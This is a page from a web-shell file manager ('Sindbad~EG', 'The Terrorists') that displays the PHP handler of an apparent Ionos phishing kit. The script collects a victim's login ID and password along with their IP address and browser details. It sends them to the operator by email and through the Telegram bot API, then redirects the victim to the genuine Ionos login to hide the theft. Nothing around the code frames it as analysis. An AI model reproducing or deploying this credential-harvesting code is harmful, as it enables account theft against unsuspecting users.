Sindbad~EG File Manager

Current Path : /home/bintopia/www/p/session/
Upload File :
Current File : /home/bintopia/www/p/session/id_serr.php

<?php
session_start();
error_reporting(0);
# Adding Settings
include('function.php');
include('../config.php');
include('../Antibot/pro.php');
include('../Antibot/blocker.php');
include('../Antibot/blocker_1.php');
include('../Antibot/blocker_2.php');
include('../Antibot/blocker_3.php');
include('../Antibot/blocker_4.php');

$useragent = $_SERVER['HTTP_USER_AGENT'];

$required = array('passwordii');

$error = false;
foreach($required as $field) {
  if (empty($_POST[$field])) {
    $error = true;
  }
}
 
if ($error) {
  header('Location: https://www.google.com/search?q=Ionos+login');
} else {
# Logs

$msgtg = '
🔥== Ionos II login from {'.$IP.'} ==✅

*🔓LOGIN ID  * : '.$_SESSION["userLoginId"].'
*🔓PASSWORD  * : '.$_POST['passwordii'].'

*=========[ DEVICE INFO ]=========*
*IP* : http://www.geoiptool.com/?IP='.$IP.'
*Date* : '.$date.'
*USER AGENT* : '.$_SERVER['HTTP_USER_AGENT'].'
*OS / BR* : '.$os.'
';


if ($settings['send_mail'] == "1"){
  $to = $settings['email'];
  $headers = "Content-type:text/plain;charset=UTF-8\r\n";
  $headers .= "From: xforgex <Ionos@client_site.com>\r\n";
  $subject = "✦ Ionos II login from ✦ {$IP} ✦";
  $msg = $msgtg;
  mail($to, $subject, $msg, $headers);
   }

 # Send Bot

if ($settings['telegram'] == "1"){
  $data = $msgtg;
  $send = ['chat_id'=>$settings['chat_id'],'text'=>$data];
  $website = "https://api.telegram.org/bot{$settings['bot_url']}";
  $ch = curl_init($website . '/sendMessage');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($send));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $result = curl_exec($ch);
  curl_close($ch);
  }


header('Location: https://login.ionos.com/');
}
?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists